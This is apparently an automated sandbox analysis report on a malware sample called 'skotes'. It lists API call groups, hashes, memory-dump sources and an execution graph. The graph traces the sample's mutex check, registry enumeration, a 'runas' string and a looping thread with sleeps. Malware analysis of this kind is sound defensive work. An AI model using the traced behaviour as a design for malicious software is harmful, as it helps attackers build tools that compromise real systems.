                    • Instruction ID: 503cb7ceeff1a744cf1d17299d77b70172232acdf132f040cf1949548f0a76cb
                    • Opcode Fuzzy Hash: 65fe2d25819fbcf81a19c36cb243a6994e9bb55f4a4ff3c1705520088a00f9a9
                    • Instruction Fuzzy Hash: 2E110B3DE81765ABCF224F649C64B2A376CDF017A0F190623F811A7291D770ED04C6E4
                    APIs
                    • Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0218F576
                      • Part of subcall function 0218F732: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 021956ED
                    • Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 0218F597
                      • Part of subcall function 02190419: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 02190435
                    • Concurrency::details::GetSharedTimerQueue.LIBCONCRT ref: 0218F5B3
                    • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 0218F5BA
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Timer$Scheduler$Base::LibraryLoadQueue$AsyncConcurrency::details::platform::__ContextCreateCurrentDefaultReferenceRegisterShared
                    • String ID:
                    • API String ID: 1684785560-0
                    • Opcode ID: 04357caceeb09c65516863605c6f7112208db5e15fbad483dcb42361f4682929
                    • Instruction ID: fdcccd757252db87d26ba880b9494fdf7b610a1834ec5e313602add0d36ac087
                    • Opcode Fuzzy Hash: 04357caceeb09c65516863605c6f7112208db5e15fbad483dcb42361f4682929
                    • Instruction Fuzzy Hash: 920100B1580305BFEB307F68CCC09ABBBE9EF10344B90492AE86592581D77096568EA1
                    APIs
                    • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 021A3642
                    • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 021A3656
                    • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 021A366E
                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 021A3686
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                    • String ID:
                    • API String ID: 78362717-0
                    • Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                    • Instruction ID: 950a6ca26458d6e273c38e0cad4959980ca403f059e6ee5a8f24e300cfe20e9f
                    • Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                    • Instruction Fuzzy Hash: 7301D63A680114ABCF16AE5D9960BEF77AA9F84750F000095FC25A7381DB70EE118AE0
                    APIs
                    • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,021ABC07,00000000,?,021B2212,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 021ABAB8
                    • GetLastError.KERNEL32(?,021B2212,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,021ABC07,00000000,00000104,?), ref: 021ABAC2
                    • __dosmaperr.LIBCMT ref: 021ABAC9
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorFullLastNamePath__dosmaperr
                    • String ID:
                    • API String ID: 2398240785-0
                    • Opcode ID: 573f122ae82f08db5f9a13de85ef365be3234010d0279eca2789f216f3b9dc80
                    • Instruction ID: ad9e2d4bfef4ff59be036b7981764e90f405ca58a6540e98c4984c6e7098527c
                    • Opcode Fuzzy Hash: 573f122ae82f08db5f9a13de85ef365be3234010d0279eca2789f216f3b9dc80
                    • Instruction Fuzzy Hash: 4CF0813A244655BB8B215FA2DC18D6AFF6AFF543B57018520F529C7420D731E911CBE0
                    APIs
                    • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,021ABC07,00000000,?,021B219D,00000000,00000000,021ABC07,?,?,00000000,00000000,00000001), ref: 021ABB21
                    • GetLastError.KERNEL32(?,021B219D,00000000,00000000,021ABC07,?,?,00000000,00000000,00000001,00000000,00000000,?,021ABC07,00000000,00000104), ref: 021ABB2B
                    • __dosmaperr.LIBCMT ref: 021ABB32
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorFullLastNamePath__dosmaperr
                    • String ID:
                    • API String ID: 2398240785-0
                    • Opcode ID: 8d52b872a16da2ecde656976662c890ef9145f26e1d0b0297742ad47c23117d8
                    • Instruction ID: 86653e4190eddc3a15aeff98e8ffa10b375672db99223f7b1e5a7cf1ee0c0818
                    • Opcode Fuzzy Hash: 8d52b872a16da2ecde656976662c890ef9145f26e1d0b0297742ad47c23117d8
                    • Instruction Fuzzy Hash: 9AF06D3A645655BB8B311BA2DC28D5AFF6AFF543A57008124F529C7424DB32EA21CBD0
                    APIs
                      • Part of subcall function 021901CD: TlsGetValue.KERNEL32(?,?,0218F74E,0218F57B,?,?), ref: 021901D3
                    • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 02195296
                      • Part of subcall function 0219E575: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0219E59C
                      • Part of subcall function 0219E575: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0219E5B5
                      • Part of subcall function 0219E575: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0219E62B
                      • Part of subcall function 0219E575: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 0219E633
                    • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 021952A4
                    • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 021952AE
                    • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 021952B8
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceValueVirtualWork
                    • String ID:
                    • API String ID: 2616382602-0
                    • Opcode ID: 70a698541e2e15fa6626dca2384dcb953701250920abc52d754e3547d00c3c09
                    • Instruction ID: b09fc4b8c7e84d981b8651a7e8a1d07f435087ef8fd92dd85b0dddab60737ecb
                    • Opcode Fuzzy Hash: 70a698541e2e15fa6626dca2384dcb953701250920abc52d754e3547d00c3c09
                    • Instruction Fuzzy Hash: 8FF02B35E80624BFCF26B766C810A6DF76BAF81B50B54012AE52153290DF75DA058FC2
                    APIs
                    • __EH_prolog3.LIBCMT ref: 0218FB78
                    • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0218FBAB
                    • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 0218FBB7
                    • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0218FBC0
                      • Part of subcall function 0218F554: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0218F576
                      • Part of subcall function 0218F554: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 0218F597
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Concurrency::critical_section::_Timer$Acquire_lockAsyncBase::ContextCurrentDerefH_prolog3LibraryLoadLockNodeNode::QueueRegisterSchedulerSwitch_to_active
                    • String ID:
                    • API String ID: 2559503089-0
                    • Opcode ID: 6202bdfdb5770ea946800c78cd8ea731ca40aa09cdf17d07ebd0c2e6249b1ab2
                    • Instruction ID: 538f554e2347e50fefbad5f3858fb2a1f130cf7e2657d7a0d86f890481662b4d
                    • Opcode Fuzzy Hash: 6202bdfdb5770ea946800c78cd8ea731ca40aa09cdf17d07ebd0c2e6249b1ab2
                    • Instruction Fuzzy Hash: 58F0E9316C1308AF9F34BE7458E597D32975F85364B894129A521AF7C0CF708D069E95
                    APIs
                    • WriteConsoleW.KERNEL32(02178A07,0000000F,0045FB20,00000000,02178A07,?,021B5421,02178A07,00000001,02178A07,02178A07,?,021B02FC,00000000,?,02178A07), ref: 021B6D4D
                    • GetLastError.KERNEL32(?,021B5421,02178A07,00000001,02178A07,02178A07,?,021B02FC,00000000,?,02178A07,00000000,02178A07,?,021B0850,02178A07), ref: 021B6D59
                      • Part of subcall function 021B6D1F: CloseHandle.KERNEL32(00462970,021B6D69,?,021B5421,02178A07,00000001,02178A07,02178A07,?,021B02FC,00000000,?,02178A07,00000000,02178A07), ref: 021B6D2F
                    • ___initconout.LIBCMT ref: 021B6D69
                      • Part of subcall function 021B6CE1: CreateFileW.KERNEL32(00457658,40000000,00000003,00000000,00000003,00000000,00000000,021B6D10,021B540E,02178A07,?,021B02FC,00000000,?,02178A07,00000000), ref: 021B6CF4
                    • WriteConsoleW.KERNEL32(02178A07,0000000F,0045FB20,00000000,?,021B5421,02178A07,00000001,02178A07,02178A07,?,021B02FC,00000000,?,02178A07,00000000), ref: 021B6D7E
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                    • String ID:
                    • API String ID: 2744216297-0
                    • Opcode ID: 68f8837eb1d4a2712d10f3c5b8a7bf099e143a904c0dfdbb60282304a99716f4
                    • Instruction ID: fabb813b4ec9181f979cc0da53a212672284a7389da8821d132526935654c5cc
                    • Opcode Fuzzy Hash: 68f8837eb1d4a2712d10f3c5b8a7bf099e143a904c0dfdbb60282304a99716f4
                    • Instruction Fuzzy Hash: 93F0F836141298BBCF621FA6AC08A893E2AEF493A1F104021FA1C85120D772C820DB95
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID: runas
                    • API String ID: 3472027048-4000483414
                    • Opcode ID: b12352c27eb35c7801b30b77c84677b55ae88f5f3268c2bda28ff34a47bf5de4
                    • Instruction ID: 583ae44c570c144558209a104469aad8f7e8f5f3ec8df27e7f118f85adf5f41b
                    • Opcode Fuzzy Hash: b12352c27eb35c7801b30b77c84677b55ae88f5f3268c2bda28ff34a47bf5de4
                    • Instruction Fuzzy Hash: ECE13971A40248AFEB08EB78CD85B9DBB739F81704F60865CE411AB3C5DB759A418F92
                    APIs
                      • Part of subcall function 021AE4C0: GetOEMCP.KERNEL32(00000000,021AE732,?,?,021A78C8,021A78C8,?), ref: 021AE4EB
                    • _free.LIBCMT ref: 021AE78F
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID: @"F
                    • API String ID: 269201875-3084318295
                    • Opcode ID: 9908dd6ab1a80c5fc09db8b12665e78ab5e05ea3aa24e2a155a3ad1beaefeb8c
                    • Instruction ID: 904936811325eb21e7156f24f8cd4c379015ea6ce6c9f5991456461a8b2be1ad
                    • Opcode Fuzzy Hash: 9908dd6ab1a80c5fc09db8b12665e78ab5e05ea3aa24e2a155a3ad1beaefeb8c
                    • Instruction Fuzzy Hash: AD31C279900249AFCB11DFA8C8A0B9E7BF5FF44314F1544BAE9109B2A0EB719950CF90
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID: x!F
                    • API String ID: 269201875-3062043068
                    • Opcode ID: db21be25886df150d1c6f332858b9cadf02cf268a657b562b65237ce8408447b
                    • Instruction ID: f9bedc48e1f82012ce7355e0dcc632a69d4f758ef70416d2f55481ff8f044da5
                    • Opcode Fuzzy Hash: db21be25886df150d1c6f332858b9cadf02cf268a657b562b65237ce8408447b
                    • Instruction Fuzzy Hash: E901D43D5DDA307ED63536786E30ABA12B96F02B38F160321F925A50F0EBA38915C5D5
                    APIs
                    • RtlEnterCriticalSection.NTDLL(00465750), ref: 0218D383
                    • RtlLeaveCriticalSection.NTDLL(00465750), ref: 0218D3C0
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave
                    • String ID: PWF
                    • API String ID: 3168844106-4189640852
                    • Opcode ID: aa3b7ebb98d861874e14c42a3fd8d5994544321a17c487eeef023a4b97522d77
                    • Instruction ID: 4d63040365e6adfb60cd50e9d6012cd7cf86f841a7000dd1c29fe3852255e0da
                    • Opcode Fuzzy Hash: aa3b7ebb98d861874e14c42a3fd8d5994544321a17c487eeef023a4b97522d77
                    • Instruction Fuzzy Hash: A8F08235540701DFC3147F24E984A2677A5EB45735F10022DEE55476E0DB715842CE56
                    APIs
                    • __EH_prolog3.LIBCMT ref: 0219255C
                    • Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 02192572
                      • Part of subcall function 02192A99: Concurrency::details::ResourceManager::RetrieveSystemVersionInformation.LIBCONCRT ref: 02192AA8
                      • Part of subcall function 02192A99: Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 02192ABC
                      • Part of subcall function 02192A99: Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 02192ADD
                      • Part of subcall function 02192A99: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 02192B46
                      • Part of subcall function 02192A99: Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 02192CB4
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_2170000_skotes.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Manager::Resource$Information$AffinityTopology$AcquireApplyCaptureCleanupConcurrency::details::_H_prolog3Lock::_ProcessReentrantRestrictionsRetrieveSystemVersion
                    • String ID: p[F
                    • API String ID: 3302332639-1832964472
                    • Opcode ID: 84bf9b1e625644d46c927a665ec91d8dc20bfdb3b0587f4fa2234934793136a5
                    • Instruction ID: 0de47d761a580a885f091ab1f14eb7af1e5681eef074fcc67b50a7f19122ef3f
                    • Opcode Fuzzy Hash: 84bf9b1e625644d46c927a665ec91d8dc20bfdb3b0587f4fa2234934793136a5
                    • Instruction Fuzzy Hash: 48E04874740601EBEF20FB75F97076933A5AB0CB41F800429D504CF250E775E4008F19

                    Execution Graph

                    Execution Coverage:3.9%
                    Dynamic/Decrypted Code Coverage:4.2%
                    Signature Coverage:0%
                    Total number of Nodes:884
                    Total number of Limit Nodes:45
                    execution_graph 60253 405ee0 RegOpenKeyExA 60254 405f47 RegCloseKey 60253->60254 60256 405f84 60254->60256 60255 405ffe ~ListArray 60292 41cff1 60255->60292 60256->60255 60258 406016 60256->60258 60287 436c6a 60258->60287 60259 406012 60261 40601b __wsopen_s 60262 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 27 API calls 60261->60262 60263 406089 60262->60263 60264 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 27 API calls 60263->60264 60265 4060bd 60264->60265 60266 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 27 API calls 60265->60266 60267 4060ee 60266->60267 60268 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 27 API calls 60267->60268 60269 40611f 60268->60269 60270 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 27 API calls 60269->60270 60271 406150 RegOpenKeyExA 60270->60271 60272 4061a3 Concurrency::details::SchedulerBase::ThrowSchedulerEvent 60271->60272 60279 4064b1 ~ListArray 60271->60279 60273 4061b6 RegQueryInfoKeyW 60272->60273 60274 406239 60273->60274 60275 40649f RegCloseKey 60273->60275 60277 406243 RegEnumValueA 60274->60277 60282 406493 60274->60282 60285 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 27 API calls 60274->60285 60286 417a00 29 API calls Concurrency::details::_CancellationTokenState::_RegisterCallback 60274->60286 60275->60279 60276 4065d7 60278 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 60276->60278 60277->60274 60280 4065dc 60278->60280 60279->60276 60281 4065b1 ~ListArray 60279->60281 60283 41cff1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 60281->60283 60282->60275 60284 4065d3 60283->60284 60285->60274 60286->60274 60299 436bf6 25 API calls 2 library calls 60287->60299 60289 436c79 60300 436c87 IsProcessorFeaturePresent 60289->60300 60291 436c86 60293 41cffa 60292->60293 60294 41cffc IsProcessorFeaturePresent 60292->60294 60293->60259 60296 41d223 60294->60296 60310 41d1e7 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 60296->60310 60298 41d306 60298->60259 60299->60289 60301 436c93 60300->60301 60304 436aae 60301->60304 60305 436aca Concurrency::details::SchedulerBase::ThrowSchedulerEvent ___scrt_fastfail 60304->60305 60306 436af6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 60305->60306 60309 436bc7 ___scrt_fastfail 60306->60309 60307 41cff1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 60308 436be5 GetCurrentProcess TerminateProcess 60307->60308 60308->60291 60309->60307 60310->60298 60311 40a682 GetFileAttributesA 60312 40a692 ~ListArray 60311->60312 60313 40a949 60312->60313 60318 40a75d ~ListArray 60312->60318 60314 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 60313->60314 60315 40a94e 60314->60315 60316 40a953 60315->60316 60317 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 60315->60317 60317->60316 60321 4180c0 60318->60321 60320 40a903 60324 4180de __InternalCxxFrameHandler 60321->60324 60326 418104 60321->60326 60322 4181ee 60350 419270 27 API calls Concurrency::details::_CancellationTokenState::_RegisterCallback 60322->60350 60324->60320 60325 4181f3 60351 402480 27 API calls 3 library calls 60325->60351 60326->60322 60328 418158 60326->60328 60329 41817d 60326->60329 60328->60325 60336 41d3e2 60328->60336 60332 41d3e2 Concurrency::details::SchedulerProxy::GetResourceForNewSubscription 27 API calls 60329->60332 60333 418169 std::_Rethrow_future_exception 60329->60333 60330 4181f8 60332->60333 60334 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 60333->60334 60335 4181d0 ~ListArray 60333->60335 60334->60322 60335->60320 60339 41d3e7 60336->60339 60338 41d401 60338->60333 60339->60338 60341 41d403 60339->60341 60352 438be1 60339->60352 60361 438e36 RtlEnterCriticalSection RtlLeaveCriticalSection Concurrency::details::SchedulerProxy::GetResourceForNewSubscription 60339->60361 60342 402480 Concurrency::details::_CancellationTokenState::_RegisterCallback 60341->60342 60343 41d40d Concurrency::details::platform::__GetLogicalProcessorInformationEx 60341->60343 60359 433b04 RaiseException 60342->60359 60362 433b04 RaiseException 60343->60362 60346 40249c 60360 4338af 26 API calls 2 library calls 60346->60360 60347 41dd90 60349 4024c3 60349->60333 60351->60330 60358 43b04b _unexpected 60352->60358 60353 43b089 60364 4375f6 60353->60364 60355 43b074 RtlAllocateHeap 60356 43b087 60355->60356 60355->60358 60356->60339 60358->60353 60358->60355 60363 438e36 RtlEnterCriticalSection RtlLeaveCriticalSection Concurrency::details::SchedulerProxy::GetResourceForNewSubscription 60358->60363 60359->60346 60360->60349 60361->60339 60362->60347 60363->60358 60367 43a7c8 14 API calls 2 library calls 60364->60367 60366 4375fb 60366->60356 60367->60366 60368 41d762 60369 41d76e __FrameHandler3::FrameUnwindToState 60368->60369 60394 41d488 60369->60394 60371 41d775 60372 41d8ce 60371->60372 60382 41d79f ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 60371->60382 60418 41dba5 4 API calls 2 library calls 60372->60418 60374 41d8d5 60419 436629 23 API calls CallUnexpected 60374->60419 60376 41d8db 60420 4365ed 23 API calls CallUnexpected 60376->60420 60378 41d8e3 60379 41d7be 60380 41d83f 60402 4395bc 60380->60402 60382->60379 60382->60380 60417 436603 37 API calls 3 library calls 60382->60417 60384 41d845 60406 416d30 60384->60406 60395 41d491 60394->60395 60421 41dd91 IsProcessorFeaturePresent 60395->60421 60397 41d49d 60422 4347c4 10 API calls 2 library calls 60397->60422 60399 41d4a2 60400 41d4a6 60399->60400 60423 4347e3 7 API calls 2 library calls 60399->60423 60400->60371 60403 4395c5 60402->60403 60404 4395ca 60402->60404 60424 439320 49 API calls 60403->60424 60404->60384 60425 40a960 Sleep CreateMutexA GetLastError 60406->60425 60410 416d45 60411 40d6d0 79 API calls 60410->60411 60412 416d4a 60411->60412 60413 414fc0 67 API calls 60412->60413 60414 416d4f 60413->60414 60415 416d00 CreateThread 60414->60415 60416 416d20 Sleep 60415->60416 60516 416c70 60415->60516 60416->60416 60417->60380 60418->60374 60419->60376 60420->60378 60421->60397 60422->60399 60423->60400 60424->60404 60426 40a996 60425->60426 60427 40a9a7 60425->60427 60426->60427 60428 40a99a GetLastError 60426->60428 60432 40ce40 60427->60432 60428->60427 60429 40a9a9 60428->60429 60437 436629 23 API calls CallUnexpected 60429->60437 60431 40a9b0 60438 417a00 60432->60438 60434 40ce92 60454 405c10 60434->60454 60436 40ce9d 60437->60431 60439 417a26 60438->60439 60440 417a2d 60439->60440 60441 417a81 60439->60441 60442 417a62 60439->60442 60440->60434 60447 41d3e2 Concurrency::details::SchedulerProxy::GetResourceForNewSubscription 27 API calls 60441->60447 60448 417a76 std::_Rethrow_future_exception 60441->60448 60443 417ab9 60442->60443 60444 417a69 60442->60444 60470 402480 27 API calls 3 library calls 60443->60470 60446 41d3e2 Concurrency::details::SchedulerProxy::GetResourceForNewSubscription 27 API calls 60444->60446 60449 417a6f 60446->60449 60447->60448 60448->60434 60449->60448 60450 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 60449->60450 60451 417ac3 60450->60451 60453 417af1 ~ListArray __Cnd_destroy_in_situ __Mtx_destroy_in_situ Concurrency::details::_TaskCollection::~_TaskCollection 60451->60453 60471 41ba06 RtlEnterCriticalSection RtlLeaveCriticalSection Concurrency::details::_CancellationTokenState::_RegisterCallback 60451->60471 60453->60434 60472 405940 60454->60472 60460 405ce7 ~ListArray 60462 405d17 ~ListArray 60460->60462 60467 405d42 60460->60467 60461 405c7b ~ListArray 60461->60460 60463 405d3d 60461->60463 60465 41cff1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 60462->60465 60464 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 60463->60464 60464->60467 60466 405d39 60465->60466 60466->60436 60468 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 60467->60468 60469 405d47 60468->60469 60470->60449 60471->60453 60509 417f80 27 API calls 4 library calls 60472->60509 60474 40596b 60475 4059e0 60474->60475 60510 417f80 27 API calls 4 library calls 60475->60510 60477 405bdd 60479 41cff1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 60477->60479 60478 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 29 API calls 60491 405a45 60478->60491 60480 405c05 60479->60480 60502 404b30 60480->60502 60481 405c09 60512 418200 27 API calls 60481->60512 60483 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 27 API calls 60483->60491 60491->60477 60491->60478 60491->60481 60491->60483 60511 405730 27 API calls 3 library calls 60491->60511 60503 404dc2 60502->60503 60507 404b92 60502->60507 60503->60461 60504 404ce5 60504->60503 60515 418ca0 27 API calls 4 library calls 60504->60515 60507->60504 60513 436da6 40 API calls __fassign 60507->60513 60514 418ca0 27 API calls 4 library calls 60507->60514 60509->60474 60510->60491 60511->60491 60513->60507 60514->60507 60515->60504 60519 416ca0 60516->60519 60517 417a00 29 API calls Concurrency::details::_CancellationTokenState::_RegisterCallback 60517->60519 60518 405c10 44 API calls 60518->60519 60519->60517 60519->60518 60522 4147b0 60519->60522 60523 4147eb 60522->60523 60526 414ee3 ~ListArray 60522->60526 60525 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 29 API calls 60523->60525 60523->60526 60524 414f59 ~ListArray 60528 41cff1 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 60524->60528 60527 41480c 60525->60527 60526->60524 60529 414fb5 60526->60529 60531 405c10 44 API calls 60527->60531 60532 414f7a Sleep 60528->60532 60530 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 60529->60530 60533 414fba 60530->60533 60534 414813 60531->60534 60532->60519 60535 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 29 API calls 60534->60535 60536 414825 60535->60536 60537 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 29 API calls 60536->60537 60538 414837 60537->60538 60636 40be30 60538->60636 60541 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 29 API calls 60542 414858 60541->60542 60543 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 29 API calls 60542->60543 60544 414870 60543->60544 60545 405c10 44 API calls 60544->60545 60546 414877 60545->60546 60667 408580 60546->60667 60549 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 29 API calls 60551 41489f 60549->60551 60550 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 29 API calls 60552 414b2f 60550->60552 60553 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 29 API calls 60551->60553 60554 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 29 API calls 60552->60554 60555 4148b7 60553->60555 60556 414b44 60554->60556 60557 405c10 44 API calls 60555->60557 60558 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 29 API calls 60556->60558 60560 4148be 60557->60560 60559 414b56 60558->60559 60562 40be30 51 API calls 60559->60562 60561 408580 27 API calls 60560->60561 60563 4148ca 60561->60563 60564 414b62 60562->60564 60566 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 29 API calls 60563->60566 60617 414afd 60563->60617 60565 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 29 API calls 60564->60565 60567 414b77 60565->60567 60568 4148e7 60566->60568 60569 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 29 API calls 60567->60569 60570 405c10 44 API calls 60568->60570 60571 414b8f 60569->60571 60575 4148ef 60570->60575 60572 405c10 44 API calls 60571->60572 60573 414b96 60572->60573 60574 408580 27 API calls 60573->60574 60576 414ba2 60574->60576 60577 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 27 API calls 60575->60577 60578 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 29 API calls 60576->60578 60579 414e70 ~ListArray 60576->60579 60588 414959 ~ListArray 60577->60588 60580 414bbe 60578->60580 60579->60526 60581 414fb0 60579->60581 60582 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 29 API calls 60580->60582 60583 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 60581->60583 60584 414bd6 60582->60584 60583->60529 60585 405c10 44 API calls 60584->60585 60587 414bdd 60585->60587 60586 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 29 API calls 60589 4149e6 60586->60589 60590 408580 27 API calls 60587->60590 60588->60586 60591 405c10 44 API calls 60589->60591 60592 414be9 60590->60592 60594 4149ee 60591->60594 60592->60579 60593 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 29 API calls 60592->60593 60595 414c06 60593->60595 60596 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 27 API calls 60594->60596 60597 405c10 44 API calls 60595->60597 60600 414a49 ~ListArray 60596->60600 60598 414c0e 60597->60598 60601 414f97 60598->60601 60602 414c5a 60598->60602 